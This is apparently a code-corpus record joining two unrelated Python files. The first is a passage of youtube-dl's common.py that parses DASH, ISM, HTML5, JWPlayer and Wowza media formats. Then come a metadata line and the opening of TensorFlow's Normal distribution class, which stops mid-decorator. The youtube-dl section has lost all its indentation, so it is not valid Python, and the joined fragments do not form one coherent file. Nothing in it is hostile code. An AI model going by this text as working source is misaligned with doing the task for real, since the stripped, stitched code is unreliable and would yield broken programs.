# Next, $...$ templates are translated to their
# %(...) counterparts to be used with % operator
t = t.replace('$RepresentationID$', representation_id)
t = re.sub(r'\$(%s)\$' % '|'.join(identifiers), r'%(\1)d', t)
t = re.sub(r'\$(%s)%%([^$]+)\$' % '|'.join(identifiers), r'%(\1)\2', t)
t.replace('$$', '$')
return t
# @initialization is a regular template like @media one
# so it should be handled just the same way (see
# https://github.com/rg3/youtube-dl/issues/11605)
if 'initialization' in representation_ms_info:
initialization_template = prepare_template(
'initialization',
# As per [1, 5.3.9.4.2, Table 15, page 54] $Number$ and
# $Time$ shall not be included for @initialization thus
# only $Bandwidth$ remains
('Bandwidth', ))
representation_ms_info['initialization_url'] = initialization_template % {
'Bandwidth': bandwidth,
}
def location_key(location):
return 'url' if re.match(r'^https?://', location) else 'path'
if 'segment_urls' not in representation_ms_info and 'media' in representation_ms_info:
media_template = prepare_template('media', ('Number', 'Bandwidth', 'Time'))
media_location_key = location_key(media_template)
# As per [1, 5.3.9.4.4, Table 16, page 55] $Number$ and $Time$
# can't be used at the same time
if '%(Number' in media_template and 's' not in representation_ms_info:
segment_duration = None
if 'total_number' not in representation_ms_info and 'segment_duration' in representation_ms_info:
segment_duration = float_or_none(representation_ms_info['segment_duration'], representation_ms_info['timescale'])
representation_ms_info['total_number'] = int(math.ceil(float(period_duration) / segment_duration))
representation_ms_info['fragments'] = [{
media_location_key: media_template % {
'Number': segment_number,
'Bandwidth': bandwidth,
},
'duration': segment_duration,
} for segment_number in range(
representation_ms_info['start_number'],
representation_ms_info['total_number'] + representation_ms_info['start_number'])]
else:
# $Number*$ or $Time$ in media template with S list available
# Example $Number*$: http://www.svtplay.se/klipp/9023742/stopptid-om-bjorn-borg
# Example $Time$: https://play.arkena.com/embed/avp/v2/player/media/b41dda37-d8e7-4d3f-b1b5-9a9db578bdfe/1/129411
representation_ms_info['fragments'] = []
segment_time = 0
segment_d = None
segment_number = representation_ms_info['start_number']
def add_segment_url():
segment_url = media_template % {
'Time': segment_time,
'Bandwidth': bandwidth,
'Number': segment_number,
}
representation_ms_info['fragments'].append({
media_location_key: segment_url,
'duration': float_or_none(segment_d, representation_ms_info['timescale']),
})
for num, s in enumerate(representation_ms_info['s']):
segment_time = s.get('t') or segment_time
segment_d = s['d']
add_segment_url()
segment_number += 1
for r in range(s.get('r', 0)):
segment_time += segment_d
add_segment_url()
segment_number += 1
segment_time += segment_d
elif 'segment_urls' in representation_ms_info and 's' in representation_ms_info:
# No media template
# Example: https://www.youtube.com/watch?v=iXZV5uAYMJI
# or any YouTube dashsegments video
fragments = []
segment_index = 0
timescale = representation_ms_info['timescale']
for s in representation_ms_info['s']:
duration = float_or_none(s['d'], timescale)
for r in range(s.get('r', 0) + 1):
segment_uri = representation_ms_info['segment_urls'][segment_index]
fragments.append({
location_key(segment_uri): segment_uri,
'duration': duration,
})
segment_index += 1
representation_ms_info['fragments'] = fragments
elif 'segment_urls' in representation_ms_info:
# Segment URLs with no SegmentTimeline
# Example: https://www.seznam.cz/zpravy/clanek/cesko-zasahne-vitr-o-sile-vichrice-muze-byt-i-zivotu-nebezpecny-39091
# https://github.com/rg3/youtube-dl/pull/14844
fragments = []
segment_duration = float_or_none(
representation_ms_info['segment_duration'],
representation_ms_info['timescale']) if 'segment_duration' in representation_ms_info else None
for segment_url in representation_ms_info['segment_urls']:
fragment = {
location_key(segment_url): segment_url,
}
if segment_duration:
fragment['duration'] = segment_duration
fragments.append(fragment)
representation_ms_info['fragments'] = fragments
# NB: MPD manifest may contain direct URLs to unfragmented media.
# No fragments key is present in this case.
if 'fragments' in representation_ms_info:
f.update({
'fragment_base_url': base_url,
'fragments': [],
'protocol': 'http_dash_segments',
})
if 'initialization_url' in representation_ms_info:
initialization_url = representation_ms_info['initialization_url']
if not f.get('url'):
f['url'] = initialization_url
f['fragments'].append({location_key(initialization_url): initialization_url})
f['fragments'].extend(representation_ms_info['fragments'])
# According to [1, 5.3.5.2, Table 7, page 35] @id of Representation
# is not necessarily unique within a Period thus formats with
# the same `format_id` are quite possible. There are numerous examples
# of such manifests (see https://github.com/rg3/youtube-dl/issues/15111,
# https://github.com/rg3/youtube-dl/issues/13919)
full_info = formats_dict.get(representation_id, {}).copy()
full_info.update(f)
formats.append(full_info)
else:
self.report_warning('Unknown MIME type %s in DASH manifest' % mime_type)
return formats
def _extract_ism_formats(self, ism_url, video_id, ism_id=None, note=None, errnote=None, fatal=True):
res = self._download_xml_handle(
ism_url, video_id,
note=note or 'Downloading ISM manifest',
errnote=errnote or 'Failed to download ISM manifest',
fatal=fatal)
if res is False:
return []
ism_doc, urlh = res
return self._parse_ism_formats(ism_doc, urlh.geturl(), ism_id)
def _parse_ism_formats(self, ism_doc, ism_url, ism_id=None):
"""
Parse formats from ISM manifest.
References:
1. [MS-SSTR]: Smooth Streaming Protocol,
https://msdn.microsoft.com/en-us/library/ff469518.aspx
"""
if ism_doc.get('IsLive') == 'TRUE' or ism_doc.find('Protection') is not None:
return []
duration = int(ism_doc.attrib['Duration'])
timescale = int_or_none(ism_doc.get('TimeScale')) or 10000000
formats = []
for stream in ism_doc.findall('StreamIndex'):
stream_type = stream.get('Type')
if stream_type not in ('video', 'audio'):
continue
url_pattern = stream.attrib['Url']
stream_timescale = int_or_none(stream.get('TimeScale')) or timescale
stream_name = stream.get('Name')
for track in stream.findall('QualityLevel'):
fourcc = track.get('FourCC', 'AACL' if track.get('AudioTag') == '255' else None)
# TODO: add support for WVC1 and WMAP
if fourcc not in ('H264', 'AVC1', 'AACL'):
self.report_warning('%s is not a supported codec' % fourcc)
continue
tbr = int(track.attrib['Bitrate']) // 1000
# [1] does not mention Width and Height attributes. However,
# they're often present while MaxWidth and MaxHeight are
# missing, so should be used as fallbacks
width = int_or_none(track.get('MaxWidth') or track.get('Width'))
height = int_or_none(track.get('MaxHeight') or track.get('Height'))
sampling_rate = int_or_none(track.get('SamplingRate'))
track_url_pattern = re.sub(r'{[Bb]itrate}', track.attrib['Bitrate'], url_pattern)
track_url_pattern = compat_urlparse.urljoin(ism_url, track_url_pattern)
fragments = []
fragment_ctx = {
'time': 0,
}
stream_fragments = stream.findall('c')
for stream_fragment_index, stream_fragment in enumerate(stream_fragments):
fragment_ctx['time'] = int_or_none(stream_fragment.get('t')) or fragment_ctx['time']
fragment_repeat = int_or_none(stream_fragment.get('r')) or 1
fragment_ctx['duration'] = int_or_none(stream_fragment.get('d'))
if not fragment_ctx['duration']:
try:
next_fragment_time = int(stream_fragment[stream_fragment_index + 1].attrib['t'])
except IndexError:
next_fragment_time = duration
fragment_ctx['duration'] = (next_fragment_time - fragment_ctx['time']) / fragment_repeat
for _ in range(fragment_repeat):
fragments.append({
'url': re.sub(r'{start[ _]time}', compat_str(fragment_ctx['time']), track_url_pattern),
'duration': fragment_ctx['duration'] / stream_timescale,
})
fragment_ctx['time'] += fragment_ctx['duration']
format_id = []
if ism_id:
format_id.append(ism_id)
if stream_name:
format_id.append(stream_name)
format_id.append(compat_str(tbr))
formats.append({
'format_id': '-'.join(format_id),
'url': ism_url,
'manifest_url': ism_url,
'ext': 'ismv' if stream_type == 'video' else 'isma',
'width': width,
'height': height,
'tbr': tbr,
'asr': sampling_rate,
'vcodec': 'none' if stream_type == 'audio' else fourcc,
'acodec': 'none' if stream_type == 'video' else fourcc,
'protocol': 'ism',
'fragments': fragments,
'_download_params': {
'duration': duration,
'timescale': stream_timescale,
'width': width or 0,
'height': height or 0,
'fourcc': fourcc,
'codec_private_data': track.get('CodecPrivateData'),
'sampling_rate': sampling_rate,
'channels': int_or_none(track.get('Channels', 2)),
'bits_per_sample': int_or_none(track.get('BitsPerSample', 16)),
'nal_unit_length_field': int_or_none(track.get('NALUnitLengthField', 4)),
},
})
return formats
def _parse_html5_media_entries(self, base_url, webpage, video_id, m3u8_id=None, m3u8_entry_protocol='m3u8', mpd_id=None, preference=None):
def absolute_url(item_url):
return urljoin(base_url, item_url)
def parse_content_type(content_type):
if not content_type:
return {}
ctr = re.search(r'(?P<mimetype>[^/]+/[^;]+)(?:;\s*codecs="?(?P<codecs>[^"]+))?', content_type)
if ctr:
mimetype, codecs = ctr.groups()
f = parse_codecs(codecs)
f['ext'] = mimetype2ext(mimetype)
return f
return {}
def _media_formats(src, cur_media_type, type_info={}):
full_url = absolute_url(src)
ext = type_info.get('ext') or determine_ext(full_url)
if ext == 'm3u8':
is_plain_url = False
formats = self._extract_m3u8_formats(
full_url, video_id, ext='mp4',
entry_protocol=m3u8_entry_protocol, m3u8_id=m3u8_id,
preference=preference, fatal=False)
elif ext == 'mpd':
is_plain_url = False
formats = self._extract_mpd_formats(
full_url, video_id, mpd_id=mpd_id, fatal=False)
else:
is_plain_url = True
formats = [{
'url': full_url,
'vcodec': 'none' if cur_media_type == 'audio' else None,
}]
return is_plain_url, formats
entries = []
# amp-video and amp-audio are very similar to their HTML5 counterparts
# so we wll include them right here (see
# https://www.ampproject.org/docs/reference/components/amp-video)
media_tags = [(media_tag, media_type, '')
for media_tag, media_type
in re.findall(r'(?s)(<(?:amp-)?(video|audio)[^>]*/>)', webpage)]
media_tags.extend(re.findall(
# We only allow video|audio followed by a whitespace or '>'.
# Allowing more characters may end up in significant slow down (see
# https://github.com/rg3/youtube-dl/issues/11979, example URL:
# http://www.porntrex.com/maps/videositemap.xml).
r'(?s)(<(?P<tag>(?:amp-)?(?:video|audio))(?:\s+[^>]*)?>)(.*?)</(?P=tag)>', webpage))
for media_tag, media_type, media_content in media_tags:
media_info = {
'formats': [],
'subtitles': {},
}
media_attributes = extract_attributes(media_tag)
src = media_attributes.get('src')
if src:
_, formats = _media_formats(src, media_type)
media_info['formats'].extend(formats)
media_info['thumbnail'] = absolute_url(media_attributes.get('poster'))
if media_content:
for source_tag in re.findall(r'<source[^>]+>', media_content):
source_attributes = extract_attributes(source_tag)
src = source_attributes.get('src')
if not src:
continue
f = parse_content_type(source_attributes.get('type'))
is_plain_url, formats = _media_formats(src, media_type, f)
if is_plain_url:
# res attribute is not standard but seen several times
# in the wild
f.update({
'height': int_or_none(source_attributes.get('res')),
'format_id': source_attributes.get('label'),
})
f.update(formats[0])
media_info['formats'].append(f)
else:
media_info['formats'].extend(formats)
for track_tag in re.findall(r'<track[^>]+>', media_content):
track_attributes = extract_attributes(track_tag)
kind = track_attributes.get('kind')
if not kind or kind in ('subtitles', 'captions'):
src = track_attributes.get('src')
if not src:
continue
lang = track_attributes.get('srclang') or track_attributes.get('lang') or track_attributes.get('label')
media_info['subtitles'].setdefault(lang, []).append({
'url': absolute_url(src),
})
for f in media_info['formats']:
f.setdefault('http_headers', {})['Referer'] = base_url
if media_info['formats'] or media_info['subtitles']:
entries.append(media_info)
return entries
def _extract_akamai_formats(self, manifest_url, video_id, hosts={}):
formats = []
hdcore_sign = 'hdcore=3.7.0'
f4m_url = re.sub(r'(https?://[^/]+)/i/', r'\1/z/', manifest_url).replace('/master.m3u8', '/manifest.f4m')
hds_host = hosts.get('hds')
if hds_host:
f4m_url = re.sub(r'(https?://)[^/]+', r'\1' + hds_host, f4m_url)
if 'hdcore=' not in f4m_url:
f4m_url += ('&' if '?' in f4m_url else '?') + hdcore_sign
f4m_formats = self._extract_f4m_formats(
f4m_url, video_id, f4m_id='hds', fatal=False)
for entry in f4m_formats:
entry.update({'extra_param_to_segment_url': hdcore_sign})
formats.extend(f4m_formats)
m3u8_url = re.sub(r'(https?://[^/]+)/z/', r'\1/i/', manifest_url).replace('/manifest.f4m', '/master.m3u8')
hls_host = hosts.get('hls')
if hls_host:
m3u8_url = re.sub(r'(https?://)[^/]+', r'\1' + hls_host, m3u8_url)
formats.extend(self._extract_m3u8_formats(
m3u8_url, video_id, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
return formats
def _extract_wowza_formats(self, url, video_id, m3u8_entry_protocol='m3u8_native', skip_protocols=[]):
query = compat_urlparse.urlparse(url).query
url = re.sub(r'/(?:manifest|playlist|jwplayer)\.(?:m3u8|f4m|mpd|smil)', '', url)
mobj = re.search(
r'(?:(?:http|rtmp|rtsp)(?P<s>s)?:)?(?P<url>//[^?]+)', url)
url_base = mobj.group('url')
http_base_url = '%s%s:%s' % ('http', mobj.group('s') or '', url_base)
formats = []
def manifest_url(manifest):
m_url = '%s/%s' % (http_base_url, manifest)
if query:
m_url += '?%s' % query
return m_url
if 'm3u8' not in skip_protocols:
formats.extend(self._extract_m3u8_formats(
manifest_url('playlist.m3u8'), video_id, 'mp4',
m3u8_entry_protocol, m3u8_id='hls', fatal=False))
if 'f4m' not in skip_protocols:
formats.extend(self._extract_f4m_formats(
manifest_url('manifest.f4m'),
video_id, f4m_id='hds', fatal=False))
if 'dash' not in skip_protocols:
formats.extend(self._extract_mpd_formats(
manifest_url('manifest.mpd'),
video_id, mpd_id='dash', fatal=False))
if re.search(r'(?:/smil:|\.smil)', url_base):
if 'smil' not in skip_protocols:
rtmp_formats = self._extract_smil_formats(
manifest_url('jwplayer.smil'),
video_id, fatal=False)
for rtmp_format in rtmp_formats:
rtsp_format = rtmp_format.copy()
rtsp_format['url'] = '%s/%s' % (rtmp_format['url'], rtmp_format['play_path'])
del rtsp_format['play_path']
del rtsp_format['ext']
rtsp_format.update({
'url': rtsp_format['url'].replace('rtmp://', 'rtsp://'),
'format_id': rtmp_format['format_id'].replace('rtmp', 'rtsp'),
'protocol': 'rtsp',
})
formats.extend([rtmp_format, rtsp_format])
else:
for protocol in ('rtmp', 'rtsp'):
if protocol not in skip_protocols:
formats.append({
'url': '%s:%s' % (protocol, url_base),
'format_id': protocol,
'protocol': protocol,
})
return formats
def _find_jwplayer_data(self, webpage, video_id=None, transform_source=js_to_json):
mobj = re.search(
r'(?s)jwplayer\((?P<quote>[\'"])[^\'" ]+(?P=quote)\)(?!</script>).*?\.setup\s*\((?P<options>[^)]+)\)',
webpage)
if mobj:
try:
jwplayer_data = self._parse_json(mobj.group('options'),
video_id=video_id,
transform_source=transform_source)
except ExtractorError:
pass
else:
if isinstance(jwplayer_data, dict):
return jwplayer_data
def _extract_jwplayer_data(self, webpage, video_id, *args, **kwargs):
jwplayer_data = self._find_jwplayer_data(
webpage, video_id, transform_source=js_to_json)
return self._parse_jwplayer_data(
jwplayer_data, video_id, *args, **kwargs)
def _parse_jwplayer_data(self, jwplayer_data, video_id=None, require_title=True,
m3u8_id=None, mpd_id=None, rtmp_params=None, base_url=None):
# JWPlayer backward compatibility: flattened playlists
# https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/api/config.js#L81-L96
if 'playlist' not in jwplayer_data:
jwplayer_data = {'playlist': [jwplayer_data]}
entries = []
# JWPlayer backward compatibility: single playlist item
# https://github.com/jwplayer/jwplayer/blob/v7.7.0/src/js/playlist/playlist.js#L10
if not isinstance(jwplayer_data['playlist'], list):
jwplayer_data['playlist'] = [jwplayer_data['playlist']]
for video_data in jwplayer_data['playlist']:
# JWPlayer backward compatibility: flattened sources
# https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/playlist/item.js#L29-L35
if 'sources' not in video_data:
video_data['sources'] = [video_data]
this_video_id = video_id or video_data['mediaid']
formats = self._parse_jwplayer_formats(
video_data['sources'], video_id=this_video_id, m3u8_id=m3u8_id,
mpd_id=mpd_id, rtmp_params=rtmp_params, base_url=base_url)
subtitles = {}
tracks = video_data.get('tracks')
if tracks and isinstance(tracks, list):
for track in tracks:
if not isinstance(track, dict):
continue
track_kind = track.get('kind')
if not track_kind or not isinstance(track_kind, compat_str):
continue
if track_kind.lower() not in ('captions', 'subtitles'):
continue
track_url = urljoin(base_url, track.get('file'))
if not track_url:
continue
subtitles.setdefault(track.get('label') or 'en', []).append({
'url': self._proto_relative_url(track_url)
})
entry = {
'id': this_video_id,
'title': unescapeHTML(video_data['title'] if require_title else video_data.get('title')),
'description': video_data.get('description'),
'thumbnail': self._proto_relative_url(video_data.get('image')),
'timestamp': int_or_none(video_data.get('pubdate')),
'duration': float_or_none(jwplayer_data.get('duration') or video_data.get('duration')),
'subtitles': subtitles,
}
# https://github.com/jwplayer/jwplayer/blob/master/src/js/utils/validator.js#L32
if len(formats) == 1 and re.search(r'^(?:http|//).*(?:youtube\.com|youtu\.be)/.+', formats[0]['url']):
entry.update({
'_type': 'url_transparent',
'url': formats[0]['url'],
})
else:
self._sort_formats(formats)
entry['formats'] = formats
entries.append(entry)
if len(entries) == 1:
return entries[0]
else:
return self.playlist_result(entries)
def _parse_jwplayer_formats(self, jwplayer_sources_data, video_id=None,
m3u8_id=None, mpd_id=None, rtmp_params=None, base_url=None):
urls = []
formats = []
for source in jwplayer_sources_data:
if not isinstance(source, dict):
continue
source_url = self._proto_relative_url(source.get('file'))
if not source_url:
continue
if base_url:
source_url = compat_urlparse.urljoin(base_url, source_url)
if source_url in urls:
continue
urls.append(source_url)
source_type = source.get('type') or ''
ext = mimetype2ext(source_type) or determine_ext(source_url)
if source_type == 'hls' or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
source_url, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id=m3u8_id, fatal=False))
elif source_type == 'dash' or ext == 'mpd':
formats.extend(self._extract_mpd_formats(
source_url, video_id, mpd_id=mpd_id, fatal=False))
elif ext == 'smil':
formats.extend(self._extract_smil_formats(
source_url, video_id, fatal=False))
# https://github.com/jwplayer/jwplayer/blob/master/src/js/providers/default.js#L67
elif source_type.startswith('audio') or ext in (
'oga', 'aac', 'mp3', 'mpeg', 'vorbis'):
formats.append({
'url': source_url,
'vcodec': 'none',
'ext': ext,
})
else:
height = int_or_none(source.get('height'))
if height is None:
# Often no height is provided but there is a label in
# format like "1080p", "720p SD", or 1080.
height = int_or_none(self._search_regex(
r'^(\d{3,4})[pP]?(?:\b|$)', compat_str(source.get('label') or ''),
'height', default=None))
a_format = {
'url': source_url,
'width': int_or_none(source.get('width')),
'height': height,
'tbr': int_or_none(source.get('bitrate')),
'ext': ext,
}
if source_url.startswith('rtmp'):
a_format['ext'] = 'flv'
# See com/longtailvideo/jwplayer/media/RTMPMediaProvider.as
# of jwplayer.flash.swf
rtmp_url_parts = re.split(
r'((?:mp4|mp3|flv):)', source_url, 1)
if len(rtmp_url_parts) == 3:
rtmp_url, prefix, play_path = rtmp_url_parts
a_format.update({
'url': rtmp_url,
'play_path': prefix + play_path,
})
if rtmp_params:
a_format.update(rtmp_params)
formats.append(a_format)
return formats
def _live_title(self, name):
""" Generate the title for a live video """
now = datetime.datetime.now()
now_str = now.strftime('%Y-%m-%d %H:%M')
return name + ' ' + now_str
def _int(self, v, name, fatal=False, **kwargs):
res = int_or_none(v, **kwargs)
if 'get_attr' in kwargs:
print(getattr(v, kwargs['get_attr']))
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _float(self, v, name, fatal=False, **kwargs):
res = float_or_none(v, **kwargs)
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _set_cookie(self, domain, name, value, expire_time=None, port=None,
path='/', secure=False, discard=False, rest={}, **kwargs):
cookie = compat_cookiejar.Cookie(
0, name, value, port, port is not None, domain, True,
domain.startswith('.'), path, True, secure, expire_time,
discard, None, None, rest)
self._downloader.cookiejar.set_cookie(cookie)
def _get_cookies(self, url):
""" Return a compat_cookies.SimpleCookie with the cookies for the url """
req = sanitized_Request(url)
self._downloader.cookiejar.add_cookie_header(req)
return compat_cookies.SimpleCookie(req.get_header('Cookie'))
def get_testcases(self, include_onlymatching=False):
t = getattr(self, '_TEST', None)
if t:
assert not hasattr(self, '_TESTS'), \
'%s has _TEST and _TESTS' % type(self).__name__
tests = [t]
else:
tests = getattr(self, '_TESTS', [])
for t in tests:
if not include_onlymatching and t.get('only_matching', False):
continue
t['name'] = type(self).__name__[:-len('IE')]
yield t
def is_suitable(self, age_limit):
""" Test whether the extractor is generally suitable for the given
age limit (i.e. pornographic sites are not, all others usually are) """
any_restricted = False
for tc in self.get_testcases(include_onlymatching=False):
if tc.get('playlist', []):
tc = tc['playlist'][0]
is_restricted = age_restricted(
tc.get('info_dict', {}).get('age_limit'), age_limit)
if not is_restricted:
return True
any_restricted = any_restricted or is_restricted
return not any_restricted
def extract_subtitles(self, *args, **kwargs):
if (self._downloader.params.get('writesubtitles', False) or
self._downloader.params.get('listsubtitles')):
return self._get_subtitles(*args, **kwargs)
return {}
def _get_subtitles(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
@staticmethod
def _merge_subtitle_items(subtitle_list1, subtitle_list2):
""" Merge subtitle items for one language. Items with duplicated URLs
will be dropped. """
list1_urls = set([item['url'] for item in subtitle_list1])
ret = list(subtitle_list1)
ret.extend([item for item in subtitle_list2 if item['url'] not in list1_urls])
return ret
@classmethod
def _merge_subtitles(cls, subtitle_dict1, subtitle_dict2):
""" Merge two subtitle dictionaries, language by language. """
ret = dict(subtitle_dict1)
for lang in subtitle_dict2:
ret[lang] = cls._merge_subtitle_items(subtitle_dict1.get(lang, []), subtitle_dict2[lang])
return ret
def extract_automatic_captions(self, *args, **kwargs):
if (self._downloader.params.get('writeautomaticsub', False) or
self._downloader.params.get('listsubtitles')):
return self._get_automatic_captions(*args, **kwargs)
return {}
def _get_automatic_captions(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
def mark_watched(self, *args, **kwargs):
if (self._downloader.params.get('mark_watched', False) and
(self._get_login_info()[0] is not None or
self._downloader.params.get('cookiefile') is not None)):
self._mark_watched(*args, **kwargs)
def _mark_watched(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
def geo_verification_headers(self):
headers = {}
geo_verification_proxy = self._downloader.params.get('geo_verification_proxy')
if geo_verification_proxy:
headers['Ytdl-request-proxy'] = geo_verification_proxy
return headers
def _generic_id(self, url):
return compat_urllib_parse_unquote(os.path.splitext(url.rstrip('/').split('/')[-1])[0])
def _generic_title(self, url):
return compat_urllib_parse_unquote(os.path.splitext(url_basename(url))[0])
class SearchInfoExtractor(InfoExtractor):
"""
Base class for paged search queries extractors.
They accept URLs in the format _SEARCH_KEY(|all|[0-9]):{query}
Instances should define _SEARCH_KEY and _MAX_RESULTS.
"""
@classmethod
def _make_valid_url(cls):
return r'%s(?P<prefix>|[1-9][0-9]*|all):(?P<query>[\s\S]+)' % cls._SEARCH_KEY
@classmethod
def suitable(cls, url):
return re.match(cls._make_valid_url(), url) is not None
def _real_extract(self, query):
mobj = re.match(self._make_valid_url(), query)
if mobj is None:
raise ExtractorError('Invalid search query "%s"' % query)
prefix = mobj.group('prefix')
query = mobj.group('query')
if prefix == '':
return self._get_n_results(query, 1)
elif prefix == 'all':
return self._get_n_results(query, self._MAX_RESULTS)
else:
n = int(prefix)
if n <= 0:
raise ExtractorError('invalid download number %s for query "%s"' % (n, query))
elif n > self._MAX_RESULTS:
self._downloader.report_warning('%s returns max %i results (you requested %i)' % (self._SEARCH_KEY, self._MAX_RESULTS, n))
n = self._MAX_RESULTS
return self._get_n_results(query, n)
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
raise NotImplementedError('This method must be implemented by subclasses')
@property
def SEARCH_KEY(self):
return self._SEARCH_KEY
|
stannynuytkens/youtube-dl
|
youtube_dl/extractor/common.py
|
Python
|
unlicense
| 133,604
|
[
"VisIt"
] |
3abe2d3b0a052b28de7aa97949e984ffa043db59a3b9233900ec359d77203909
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Normal (Gaussian) distribution class."""
import math
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import special_math
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"Normal",
"NormalWithSoftplusScale",
]
@tf_export(v1=["distributions.Normal"])
class Normal(distribution.Distribution):
"""The Normal distribution with location `loc` and `scale` parameters.
#### Mathematical details
The probability density function (pdf) is,
```none
pdf(x; mu, sigma) = exp(-0.5 (x - mu)**2 / sigma**2) / Z
Z = (2 pi sigma**2)**0.5
```
where `loc = mu` is the mean, `scale = sigma` is the std. deviation, and, `Z`
is the normalization constant.
The Normal distribution is a member of the [location-scale family](
https://en.wikipedia.org/wiki/Location-scale_family), i.e., it can be
constructed as,
```none
X ~ Normal(loc=0, scale=1)
Y = loc + scale * X
```
#### Examples
Examples of initialization of one or a batch of distributions.
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
# Define a single scalar Normal distribution.
dist = tfd.Normal(loc=0., scale=3.)
# Evaluate the cdf at 1, returning a scalar.
dist.cdf(1.)
# Define a batch of two scalar valued Normals.
# The first has mean 1 and standard deviation 11, the second 2 and 22.
dist = tfd.Normal(loc=[1, 2.], scale=[11, 22.])
# Evaluate the pdf of the first distribution on 0, and the second on 1.5,
# returning a length two tensor.
dist.prob([0, 1.5])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
Arguments are broadcast when possible.
```python
# Define a batch of two scalar valued Normals.
# Both have mean 1, but different standard deviations.
dist = tfd.Normal(loc=1., scale=[11, 22.])
# Evaluate the pdf of both distributions on the same point, 3.0,
# returning a length 2 tensor.
dist.prob(3.0)
```
"""
@deprecation.deprecated(
"2019-01-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.distributions`.",
warn_once=True)
def __init__(self,
loc,
scale,
validate_args=False,
allow_nan_stats=True,
name="Normal"):
"""Construct Normal distributions with mean and stddev `loc` and `scale`.
The parameters `loc` and `scale` must be shaped in a way that supports
broadcasting (e.g. `loc + scale` is a valid operation).
Args:
loc: Floating point tensor; the means of the distribution(s).
scale: Floating point tensor; the stddevs of the distribution(s).
Must contain only positive values.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value "`NaN`" to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
Raises:
TypeError: if `loc` and `scale` have different `dtype`.
"""
parameters = dict(locals())
with ops.name_scope(name, values=[loc, scale]) as name:
with ops.control_dependencies([check_ops.assert_positive(scale)] if
validate_args else []):
self._loc = array_ops.identity(loc, name="loc")
self._scale = array_ops.identity(scale, name="scale")
check_ops.assert_same_float_dtype([self._loc, self._scale])
super(Normal, self).__init__(
dtype=self._scale.dtype,
reparameterization_type=distribution.FULLY_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._loc, self._scale],
name=name)
@staticmethod
def _param_shapes(sample_shape):
return dict(
zip(("loc", "scale"), ([ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32)] * 2)))
@property
def loc(self):
"""Distribution parameter for the mean."""
return self._loc
@property
def scale(self):
"""Distribution parameter for standard deviation."""
return self._scale
def _batch_shape_tensor(self):
return array_ops.broadcast_dynamic_shape(
array_ops.shape(self.loc),
array_ops.shape(self.scale))
def _batch_shape(self):
return array_ops.broadcast_static_shape(
self.loc.get_shape(),
self.scale.get_shape())
def _event_shape_tensor(self):
return constant_op.constant([], dtype=dtypes.int32)
def _event_shape(self):
return tensor_shape.TensorShape([])
def _sample_n(self, n, seed=None):
shape = array_ops.concat([[n], self.batch_shape_tensor()], 0)
sampled = random_ops.random_normal(
shape=shape, mean=0., stddev=1., dtype=self.loc.dtype, seed=seed)
return sampled * self.scale + self.loc
def _log_prob(self, x):
return self._log_unnormalized_prob(x) - self._log_normalization()
def _log_cdf(self, x):
return special_math.log_ndtr(self._z(x))
def _cdf(self, x):
return special_math.ndtr(self._z(x))
def _log_survival_function(self, x):
return special_math.log_ndtr(-self._z(x))
def _survival_function(self, x):
return special_math.ndtr(-self._z(x))
def _log_unnormalized_prob(self, x):
return -0.5 * math_ops.square(self._z(x))
def _log_normalization(self):
return 0.5 * math.log(2. * math.pi) + math_ops.log(self.scale)
def _entropy(self):
# Use broadcasting rules to calculate the full broadcast scale.
scale = self.scale * array_ops.ones_like(self.loc)
return 0.5 * math.log(2. * math.pi * math.e) + math_ops.log(scale)
def _mean(self):
return self.loc * array_ops.ones_like(self.scale)
def _quantile(self, p):
return self._inv_z(special_math.ndtri(p))
def _stddev(self):
return self.scale * array_ops.ones_like(self.loc)
def _mode(self):
return self._mean()
def _z(self, x):
"""Standardize input `x` to a unit normal."""
with ops.name_scope("standardize", values=[x]):
return (x - self.loc) / self.scale
def _inv_z(self, z):
"""Reconstruct input `x` from a its normalized version."""
with ops.name_scope("reconstruct", values=[z]):
return z * self.scale + self.loc
class NormalWithSoftplusScale(Normal):
"""Normal with softplus applied to `scale`."""
@deprecation.deprecated(
"2019-01-01",
"Use `tfd.Normal(loc, tf.nn.softplus(scale)) "
"instead.",
warn_once=True)
